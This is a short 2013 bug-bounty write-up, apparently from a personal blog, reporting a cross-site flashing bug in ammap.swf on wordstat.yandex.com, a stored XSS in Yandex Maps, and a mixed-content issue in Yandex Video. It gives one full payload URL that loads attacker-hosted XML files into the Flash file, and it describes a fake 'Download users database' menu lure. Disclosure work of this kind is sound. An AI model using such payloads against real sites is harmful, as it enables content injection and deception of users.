czwartek, 29 sierpnia 2013

Yandex Bug Bounty - Multiple Vulnerabilities

Few weeks ago I reported few bugs as part of Yandex Bug Bounty Program. Check it out:

1) Cross-Site Flashing  - wordstat.yandex.com

Bug in ammap.swf, that allows us to use configuration files from external resources, modify Flash content and of course - abuse it. :)

This resource is removed at the moment, but here you have payload URL I used:

http://wordstat.yandex.com/flash/ammap/ammap.swf?settings_file=http://myhost/yandex.xml&data_file=http://myhost/evil_data.xml

Configuration files: yandex.xml oraz evil_data.xml

First - check the context menu and new option - 'Download users database from this region' ;)


After clicking - our "database" is prepared to download - information in bottom of site.


When progress is 100% - our payload is executed.


2) Stored XSS - Yandex Maps

I provided short PoC video:



3) Mixed-content - Yandex Video

This one wasn't rewarded and in fact - all modern browsers blocks mixed-content at the moment (also Firefox). Demonstration video just for education purposes and fun ;-)




Brak komentarzy:

Prześlij komentarz